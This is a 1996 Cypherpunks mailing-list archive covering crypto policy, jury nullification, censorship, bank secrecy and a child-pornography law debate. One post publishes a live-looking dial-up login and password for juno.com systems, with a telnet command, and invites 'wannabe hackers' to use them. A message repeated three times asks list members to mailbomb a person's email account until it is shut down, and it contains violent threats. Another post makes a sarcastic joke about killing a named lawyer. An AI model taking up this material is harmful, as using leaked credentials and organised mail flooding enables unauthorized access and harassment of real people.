DOI project contact at CNRI is Constance McLindon, Director, System
Deployment--(703) 620-8990; mclindon@cnri.reston.va.us.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 12 Sep 1996 08:26:47 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: RE: Hacking Mobil Telephone System ?
Message-ID: <9608118424.AA842483607@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, Stephan Schmidt wrote:

> If a hacker is able to phone using the number
> 0171 / 3 28 99 66 in Germany with a hacked code,
> the company will pay 100.000 DM (~65.000$) to a non
> profit organisation of the hackers choice.


"Mark O. Aldrich" <maldrich@grci.com> wrote:
>I'd also expect to get paid a hell of a lot more than $65 for doing a
penetration test on their network.  

Then how about a thousand times more than $65 US ?

When was the last time Cents/Pfennigs were denominated in 1000ths of a
Dollar/Mark? Ahh, maybe you are from Italy? ;-) 

Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Sep 1996 10:07:04 +0800
To: cypherpunks@toad.com
Subject: Did someone from juno.com say "hacking"?
Message-ID: <8Jy4TD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Attention wannabe hackers from juno.com:
Wanna lose your juno account fast?
call 1-800-575-4516 with a modem
log in as junox13, password wiujuywe
type ? for the list of commands...
One interesting command that works is
telnet x13.boston.juno.com 1793 /stream
Another interesting number is 1-800-328-2427.
They also have a load of local numbers.
One call also call their tech support (voice) at 1-800-586-6889
One can e-mail Charles Ardai at president@juno.com
and ask him to be added to the kiddie porn mailing list.
The possibilities are endless.
But hurry! The holes may be closed soon.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Thu, 12 Sep 1996 11:41:59 +0800
To: wb8foz@nrk.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609070220.WAA01026@wauug.erols.com>
Message-ID: <199609112344.QAA02699@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Try and pay cash in most Fedex offices.

Not a problem in my neighborhood, but I do notice that they write
"CASH" in large letters on the airbill.  I suppose that this gets
the package extra attention.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 12 Sep 1996 10:49:07 +0800
To: Blak Dayz <102540.2453@compuserve.com>
Subject: Re: Satellite Movement?
Message-ID: <199609112356.TAA16477@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>Blak Dayz wrote:
>>         I was out buying groceries and after they scanned the shit
through they
>> told me that all the ATMs in the City were out due to connection
problems. So i
>> go home and start trying to scan for the shits and i cant find them. If
anyone
>> knows what the hell happened i would appreciate the details. I believe it may
>> have been a solar flare that caused the companies to redirect their
satellites.

Alternatively, it may be that the host earth station that the VSAT providers
uses was affected by the hurricane.  But different ATM providers use different
technologies for connecting their ATM networks, and may mix technologies if
that's
cheapest.  VSATs are one approach, leased lines another (generally multidrop
with ugly IBMish protocols), X.25 networks, frame relay networks, etc.
Maybe all the ATM machines run by your bank were out.  But taking out all the
ATM machines in a money-using city like New York would require some major
disaster,
like a nuclear explosion or a stupid regulation written by a government
official.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 12 Sep 1996 10:42:02 +0800
To: cypherpunks@toad.com
Subject: ISODE Consortium X.509 Certification system
Message-ID: <199609112356.TAA16491@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


15 August 1996 

           ISODE Consortium Delivers an X.509 Certification Authority 

The ISODE Consortium has delivered a new security management tool, Caviar,
designed to create and manage a Certification Authority (CA) for the 
deployment of the X.509 Authentication Framework. 

Caviar, a Tcl/Tk utility, enables an administrator to effectively manage
public keys and certificates so that data transmission can be provided 
securely across networks. The tool allows the administrator to create a CA, 
to generate, locate and revoke certificates, to manipulate user keys, 
and to construct certificate revocation lists. 

Public key cryptography is widely used to deliver secure data transmission. 
The generation and control of public keys, however, require management, 
and for this purpose, X.509 describes the notion of a 'trusted' authority 
referred to as the Certification Authority. The CA is responsible for 
endorsing the identity of users whose details may be held in the X.500
Directory, and the CA issues a certificate to authenticate the user's 
name and public key. The Caviar tool, using an intuitive graphical user
interface, 
enables an administrator to create and manage these certificates easily. 

Tcl/Tk is a graphical scripting language openly available from Sun 
Microsystems Laboratories. Scripting languages provide inherent flexibility
and extensibility, and Tcl/Tk is portable to a wide range of UNIX 
(X Windows) and Microsoft (Windows) platforms. Behind the graphical 
user interface, Caviar has an underlying command mode tool kit, which can
be used if individual commands may more easily integrate into operational
environments. Furthermore, Tcl/Tk allows a high degree of customization, 
which enables ISODE Consortium customers to develop their own scripts 
and graphical user interfaces for specific applications based on Caviar. 

The ITU-T, through X.509, recommend strong authentication based on public 
key cryptosystems as the basis for providing secure services. The ISODE 
Consortium uses X.509 as the core of its security strategy. 
X.509 provides a flexible, scaleable and manageable algorithm-independent 
authentication infrastructure, which can be used as the basis for a wide
range of security services such as message encryption and access control. 

The ISODE Consortium is the leading supplier of source technology for open 
messaging, directory and security services.  The primary server products are 
an Internet/X.500 Directory Server, an Internet/X.400 Message Transfer Agent, 
and a Message Store. These products provide connectivity within and between 
organizations in a multi-vendor environment.  The ISODE Consortium has a 
world-wide customer base of over 170 clients including some of the largest 
commercial value-added resellers, service providers and research organizations.

For further information please contact: 

Gill Greenwood, International Marketing Communications Manager 
ISODE Consortium Limited, The Dome, The Square, Richmond, TW9 1DT, UK 
Telephone: +44 181 332 9091 Fax: +44 181 332 9019 
Internet: g.greenwood@isode.com  WWW: http://www.isode.com/

ISODE is a trademark of ISODE Consortium Limited 
UNIX is a registered trademark in the United States and other countries
licensed exclusively through X/Open Company Limited. 
Microsoft is a registered trademark of Microsoft Corporation

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck Thompson <chuck@nova1.net>
Date: Thu, 12 Sep 1996 12:05:49 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Child porn as thoughtcrime
Message-ID: <1.5.4.32.19960911220622.0067ad04@mail.nova-net.net>
MIME-Version: 1.0
Content-Type: text/plain


Well Andrew, pornography is meant to lead to arousal, which can lead to
aggression, which may lead to abuse.  It's a fairly common path according to
what I've read on deviancy.  Following is one association's opinion, but
don't stop there, read for yourself what some of the deviants themselves
have to say: 

<http://www.casti.com/NMV/html/nmv19.html>

An excerpt from the American Pyschiatric Association 

<http://vanbc.wimsey.com/~igregson/philias.html

At 01:59 PM 9/11/96 -0500, you wrote:
>>  The argument is not dependent upon whether or not actual
>>  children are used, any more than whether or not an actual gun
>>  is used in a robbery - the net effect is the same.  Children
>>  are harmed by the promotion of child porn because it leads to
>>  the abuse/exploitation of kids.
>
>I don't believe you.  Prove that drawings of children having sex leads to  
>the abuse/explaitation of kids.  Provide some evidence...
>
>
>andrew
>
Regards,

Chuck Thompson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 12 Sep 1996 11:23:30 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <Pine.SUN.3.95.960911144448.19567K-100000@netcom18>
Message-ID: <Pine.BSF.3.91.960911171725.17601K-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, jonathon wrote:

> On Wed, 11 Sep 1996, Gary Howland wrote:
> 
> > > But the public *is* asked to assent to those methods - your chance to vote
> > > on them is known colloquially as "jury duty".
> 
> 	But judges have said that Jury Nullification is not acceptable
> 	legal practice.

And other judges have said the opposite.

EBD


...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: saione@primenet.com
Date: Thu, 12 Sep 1996 11:09:15 +0800
To: Floyd W Odom <doom13@juno.com>
Subject: Re: talker
Message-ID: <199609120013.RAA23608@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



CC`d to cypherpunks mailing list:

I recieved this this afternoon (11/9/96), this has gone far enough, 
would anyone here care to join me in mailbombing this guy?

just reply this mail to him at doom13@juno.com
about 100 times or so, if we get about 100 people to do this it 
should generate enough traffic to close his account down.
my reply to his mail is at the bottom:


> Listen up you son of a bitch! Don't fucker call me a peice of horse shit
> you cocksucker or I'll mailbomb your ass so many times you won't even
> think of replying. You don't know shit about my hacking  mother fucker.
> Fuck you and go suck on some media crypto pussy shit. 

Listen you spotty socially unskilled adolescent masturbator:

Your petty and pathetic claims amuse me, I laugh at your worthless 
and dirty existance peon.

What have you ever hacked, have you broken any encryption codes, 
have you found security weaknesses by new and ingenious methods, have 
you practised within the hacker ethic?

I think not

You are a *WANNABEE*, a punk who knows not the slightest thing about 
systems security, can`t code, and couldn`t hack his way out of a wet 
paper bag, your mailbombing threats are about as technical as you can 
get.

in addition your flames show no linguistic creativity, just a bunch 
of crude words thrown together, get an education you trailer 
butt-fucker.

Mailbomb me, go ahead punk, make my day, if you dare to even think 
about doing so I will kick your ass, I will hurt you in ways you 
cannot imagine, I have carried out vindictive personal vendettas 
before and will do so again if necessary.

 Go on, I dare you, I double dare you motherfucker. 

Yours with the greatest respect:

Paul Bradley MbM




  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: saione@primenet.com
Date: Thu, 12 Sep 1996 11:29:02 +0800
To: Floyd W Odom <doom13@juno.com>
Subject: Re: talker
Message-ID: <199609120013.RAA23678@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



CC`d to cypherpunks mailing list:

I recieved this this afternoon (11/9/96), this has gone far enough, 
would anyone here care to join me in mailbombing this guy?

just reply this mail to him at doom13@juno.com
about 100 times or so, if we get about 100 people to do this it 
should generate enough traffic to close his account down.
my reply to his mail is at the bottom:


> Listen up you son of a bitch! Don't fucker call me a peice of horse shit
> you cocksucker or I'll mailbomb your ass so many times you won't even
> think of replying. You don't know shit about my hacking  mother fucker.
> Fuck you and go suck on some media crypto pussy shit. 

Listen you spotty socially unskilled adolescent masturbator:

Your petty and pathetic claims amuse me, I laugh at your worthless 
and dirty existance peon.

What have you ever hacked, have you broken any encryption codes, 
have you found security weaknesses by new and ingenious methods, have 
you practised within the hacker ethic?

I think not

You are a *WANNABEE*, a punk who knows not the slightest thing about 
systems security, can`t code, and couldn`t hack his way out of a wet 
paper bag, your mailbombing threats are about as technical as you can 
get.

in addition your flames show no linguistic creativity, just a bunch 
of crude words thrown together, get an education you trailer 
butt-fucker.

Mailbomb me, go ahead punk, make my day, if you dare to even think 
about doing so I will kick your ass, I will hurt you in ways you 
cannot imagine, I have carried out vindictive personal vendettas 
before and will do so again if necessary.

 Go on, I dare you, I double dare you motherfucker. 

Yours with the greatest respect:

Paul Bradley MbM




  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Thu, 12 Sep 1996 09:31:24 +0800
To: cypherpunks@toad.com
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <199609112256.RAA09825@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

: Declan answers in the affirmative that, yes, nearly all of the examples I
: cited are indeed crimes. ....
: As I well knew, which is why I presented them. (The Jock Sturges case was
: in SF,  ...

I've read in several places that the Jock Sturges case was thrown out
of court by the judge. Nobody has dragged me away in shackles for
owning "Radiant Images."  Stores selling photo books often carry his
work, and it is rarely covered with opaque plastic.

So it may be nudity that set the gendarmes (sp?) in motion, but that's
evidently not what's really illegal. I wonder what would happen if an
"adult magazine" were to reproduce Sturges' work. The court case might
be interesting...

Now apply that to the Web. Imagine there's a Sturges site, and a porn
site links to it. Does that make the Sturges material "child porn?"
If so, is the porn site illegal or the Sturges site? I suspect the
prosecutors will come down on both and let the courts sort it out.
Prior restraint, eh?

: ...the "little girls in leotards" case was only a few years ago, etc.)

Don't know about that one. Is it illegal for little girls to be
photographed in leotards now? "Nutcracker" is X rated? Move over,
Bambi.

Personally, I think the political posturing theory captures the
essence of the legislative climate.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 12 Sep 1996 12:18:44 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <2.2.32.19960911220537.00b17214@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 PM 9/10/96 -0500, Declan McCullagh wrote:
>I respectfully disagree. I spend most of my time going through sites like
>cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com,
>lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so
>on. Search engines and directories, in particular, are good chokepoints to
>block.
>
>Blocking 100 sites would certainly be significant to me -- as long as
>they're the right ones. Before the technical fixes, that is.

But aren't you, the Nazis, Lee Kwan Yew, and the Heathen Chinee all
committing the "Web Fallacy" -- the belief that the Web = The Net?  Have you
seen *any* examples of mailing list censorship?  Even the mild newsgroup
censorship attempts are easily dodged by picking up your news from a distant
server (which is not a *technological* fix but an ordinary part of reading
news since many ISPs don't carry all 30K of groups in any case).

If almost all sites are ignored, if news is available from thousands of
servers, and if mailing lists, IRC, telnet, ftp, gopher, etc are ignored;
can we say that there is much actual net censorship going on?

DCF

"The Net -- where any 12 year old can defeat the governments of the world
with 15 minutes work."  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 12 Sep 1996 12:17:22 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Child Porn as Thoughtcrime
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960912012045Z-72130@mail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From:	Chuck Thompson , a True Believer, inquired:
>
>What in the devil are you trying to say?  Maybe I'm one of those stupid
>citizen units.  I just don't get it - I'd like to, but I don't.  How about
>rephrasing your comments so that us average citizen units can understand
>your wisdom.
>...........................................................
>
>
>Well then I'll spell it out for you:
>
>.  I actually said that it is "a government" which will posture as
>sympathetic towards the whiningH^H^H^H^H^Hconcerns of citizens.   
>
>.  Political candidates very well know that citizens (voters) are looking for
>someone to save them from what ails them.  Therefore many candidates will
>make the right statements about upholding similar values. They start making
>sounds like they are going to "do something about it" (about whatever the
>latest issue is).    And their supporters will like these sounds.   Reagan
>made a quote about this sometime, something like:   "They may not hear the
>lyrics, but they hear the music."   The voters feel good because they expect
>that their discomfort will be taken care of.   Therefore they vote for the
>candidate most positive towards their needs.   The candidate is elected to
>the office for which they are running and thereby achieve their goal.
>
>.  The more that voters seek the attention of government assistance for their
>myriad problems, the more that the sphere of government involvement in the
>details of everyone's daily lives enlarges.  This enlargement of the
>government sphere of involvement, as encouraged by citizens, expands as
>people find more things to complain about.   The more personal control over
>their problems which they abdicate to the government, the more control it
>accrues.  
>
>.  Of course a government does not want to appear to be in totalitarian
>control.   Many citizens do want *someone* to be in control, however.  They
>want a benevolent overseer to be in control.  As the scope of benevolent
>services, as controlled by government, spreads out across the land, many
>people are happy that someone is in control.
>
>.  Some people are so happy about benevolent government control that they
>want it extended towards things like their own moral preferences.   Any time
>that they see the evidence of anything contrary to their own moral
>preferences, they want these visible signs of contrariness removed.  Moral
>preferences and how they relate to national circumstances are a tricky
>subject for governors and legislators.   But if it makes the citizens happy
>and keeps the governors in office, they are willing to oblige in removing
>these offenses by pursuing the "offenders".
>
> .  Reducing the expressions of these offenders helps the governors, because
>it enhances their position of control.  It helps to legitimize their
>activities and again enlarges their arena, their domain, of command.   They
>can become quite meticulous in determining what may or may not be expressed
>or said which might be offensive to someone - in particular, to themselves
>(because it may weaken their image of being benevolent and "in command" of
>the situation).
>
>.  At that point, anyone who can think in the abstract will be able to see
>that, as expression derives from thought, that what is wrong therefore with
>all of the "offenders" is their thoughts.  That is why TC May called this
>kind of offense the equivalent of "thought crime".  There is a book about
>"thought crimes" against the State which you may have heard about, though you
>may not have read.
>
>.  Thought and its relationship to the State is a deep and complex
>philosophical subject.  There are many posts in the cpunk archives which can
>provide you with insights into the anarcho-capitalist libertarian position.
>
>.  If you need any more details on "thought criminality", maybe Tim can
>answer them for you, as he's the one who brought up the subject.  I was
>merely agreeing with him.  <g>
>
>   ..
>Blanc
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 12 Sep 1996 10:04:05 +0800
To: Floyd W Odom <doom13@juno.com>
Subject: Re: talker
Message-ID: <842469316.4436.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



CC`d to cypherpunks mailing list:

I recieved this this afternoon (11/9/96), this has gone far enough, 
would anyone here care to join me in mailbombing this guy?

just reply this mail to him at doom13@juno.com
about 100 times or so, if we get about 100 people to do this it 
should generate enough traffic to close his account down.
my reply to his mail is at the bottom:


> Listen up you son of a bitch! Don't fucker call me a peice of horse shit
> you cocksucker or I'll mailbomb your ass so many times you won't even
> think of replying. You don't know shit about my hacking  mother fucker.
> Fuck you and go suck on some media crypto pussy shit. 

Listen you spotty socially unskilled adolescent masturbator:

Your petty and pathetic claims amuse me, I laugh at your worthless 
and dirty existance peon.

What have you ever hacked, have you broken any encryption codes, 
have you found security weaknesses by new and ingenious methods, have 
you practised within the hacker ethic?

I think not

You are a *WANNABEE*, a punk who knows not the slightest thing about 
systems security, can`t code, and couldn`t hack his way out of a wet 
paper bag, your mailbombing threats are about as technical as you can 
get.

in addition your flames show no linguistic creativity, just a bunch 
of crude words thrown together, get an education you trailer 
butt-fucker.

Mailbomb me, go ahead punk, make my day, if you dare to even think 
about doing so I will kick your ass, I will hurt you in ways you 
cannot imagine, I have carried out vindictive personal vendettas 
before and will do so again if necessary.

 Go on, I dare you, I double dare you motherfucker. 

Yours with the greatest respect:

Paul Bradley MbM




  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 12 Sep 1996 21:31:18 +0800
To: cypherpunks@toad.com
Subject: Re: Ban CU Secrecy, Keep TLA's!
Message-ID: <842468796.562.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>  
>    Mr David Bickford, the first British intelligence lawyer 
>    to speak publicly in the UK, said at a conference in 
>    Cambridge, 50 miles north-east of London, that there 
>    "appears to be no justification at all for offshore bank 
>    secrecy other than to protect the criminal". 

Apart from tehe confidentiality of the customer, bank, all those they 
trade with and all other interested parties, well then, they can`t be 
that important can they

>  
>    He said "offshore bank secrecy can and must be abolished" 
>    and "the UK should be the first to abolish this secrecy 
>    given their control of their dependent territory offshore 
>    centres". 

So because we choose to maintain a statist and totalitarian empire we 
had better set an example of how to do it to the rest of the world???

>  
>    Mr Bickford, who now runs an international legal 
>    consultancy, said "endemic corruption" is caused by 
>    offshore secrecy, and it is "difficult to see why it is 
>    tolerated by any other than those with an unlawful 
>    disposition". 

It is also diffult to see why I don`t go round to mr. Bickfords 
house and kill him, his dog, and his pet hamster, but I don`t, nor do 
I intend to, to say that we cannot see a reason for people wanting 
privacy is no justification for legislation that prohibits such 
privacy. 

<for any spook agencies etc. reading the above, it is NOT a death 
threat, it is a sarcastic comment>  



>    He said allowing countries to maintain offshore banking 
>    secrecy is "a classic example of the corruptive influence 
>    of organised crime". 

It is a classic example of privacy and freedom in a free society (not 
that I believe Britain falls into this category)
Has anyone got this guys IQ, it`s probably the first ever negative IQ 
in the history of the world, cheer everyone, its a historic find.

Mr. Bickford, I believe you to be a fuckwit, feel free to prove me 
wrong..

  

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 13 Sep 1996 06:07:52 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
Message-ID: <842550019.23167.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> tcmay@got.net (Timothy C. May) writes:
> > As to "tasteless and insulting," a matter of personal perspective. I find
> > it helpful to call a spade a spade, and others apparently do as well.
> >
> 
> Of course, Tim gets very uncomfortable when others call a spade a spade.


This constant character assasination of Tim is getting rather boring, 
as far as I can see, and I read all of the posts on the list, he has 
done nothing more than ignore posts from these idiots, that is his 
choice and nothing to do with anyone else.
This whole thread is taking up too much space and is just totally 
pointless. lets call it a day and just agree to differ eh?

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 12 Sep 1996 09:31:03 +0800
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.GSO.3.93.960911200728.11985B-100000@nebula>
Message-ID: <Pine.SCO.3.93.960911184130.18070A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, [ISO-8859-1] Jüri Kaljundi wrote:

> Actually 65.000$ is pronounced sixty five thousand dollars not sixty five
> dollars, at least in Eastern and Central Europe. 
> 

Ok, Juri - you win the award of having been the FIRST of the 875,00
(actually, 27 - count 'em, 27) people who sent me mail to say that in
Europe they use a comma, not a period, for their decimal point.  Sorry to
all of the rest of you who entered the contest, but you don't win squat.
Juri, you don't win squat either, but you do get this nifty little
proclamation that you were the very first.

After having traveled in Europe, I was certainly familiar with the
difference in the notation.  You also think, however, that I would have
paid more attention to what the hell I was reading before I shot off my
mouth (via my keyboard), but I didn't.  I think this is called a "brain
fart" (note to our European brothers and sisters - over there, I think you
call it a "mental fugue" or "Parliamentary election," I'm nor sure which).

This concludes our contest of the day.  I would like to thank EACH and
EVERY one of you who contributed an entry.  No further submissions will be
accepted.  Void where prohibited.

BTW, $65,000.00 USD (translate per local convention as necessary) is
*STILL* not enough to a) go up against the German police, and b) fund a
penetration attack that would bring about the opportunity to play with
really cool toys.  After all, screw the profit or charity, right?  When
it's all said and done, IT'S THE TOYS THAT REALLY MATTER. 

------------------------------------------------------------------------- 
|And if Dole wins and dies in office, they|        Mark Aldrich         |
|could just pickle him and no one would   |   GRCI INFOSEC Engineering  |
|notice.  It wouldn't be the first time we|     maldrich@grci.com       |
|had a dill-dole running the country.     | MAldrich@dockmaster.ncsc.mil|
|               -- Alan Olsen             |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 12 Sep 1996 13:02:24 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: (Fnord) Edupage, 10 September 1996
In-Reply-To: <199609111822.LAA15291@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960911185752.24407E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Ah, but first we make the use of non-escrowed crypto a felony. Then if the
bad guys use it we can put 'em away for another five years. 

Simple.

No, really.

-Declan



On Wed, 11 Sep 1996, Bill Frantz wrote:

> I'm preaching to the choir, but I can't resist.
> 
> >From Edupage, 10 September 1996:
> >A leading Clinton Administration official ... Michael Nelson, who adds 
> >that organized crime members are already some of the most sophisticated 
> >users of computer systems and strong encryption technology.  In addition, 
> >computer crackers will pose a more significant threat.
> 
> The bad guys already have strong encryption.  So why doesn't the Clinton
> administration immediately press for the widespread deployment of strong
> encryption to help defend us against the bad guys?
> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
> (408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
> frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 13:19:24 +0800
To: cypherpunks@toad.com
Subject: Jury Nullification = Voting One's Conscience
Message-ID: <ae5cc281090210049385@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:18 PM 9/11/96, Brian Davis wrote:
>On Wed, 11 Sep 1996, jonathon wrote:
>
>> On Wed, 11 Sep 1996, Gary Howland wrote:
>>
>> > > But the public *is* asked to assent to those methods - your chance
>>to vote
>> > > on them is known colloquially as "jury duty".
>>
>>       But judges have said that Jury Nullification is not acceptable
>>       legal practice.
>
>And other judges have said the opposite.

And I don't think there has _ever_ been a case of a juror prosecuted/jailed
for voting his or her conscience, regardless of jury instructions. Short of
explicitly selling one's vote, or discussing the case during deliberations
with outsiders (and probably not even then), one is essentially free to
vote one's conscience (however foolishly, as the O.J. case showed).

And the principle is a good one: jurors should not have to fear prosecution
for voting their consciences, regardless of technical details imposed by a
judge. And, of course, jurors are not required to give a court their
"reasons" for voting as they do.

Though I often condemn aspects of the American political and legal system,
it is true that an awful lot of things are done right.

--Tim May, who served _once_ on a jury (for a speeding case) in 1973, who
was called once since then, but not actually called for a jury. (I vote
every election, I am duly registered with the DMV, so I wonder why I have
only served once in 24+ years of eligibility.)


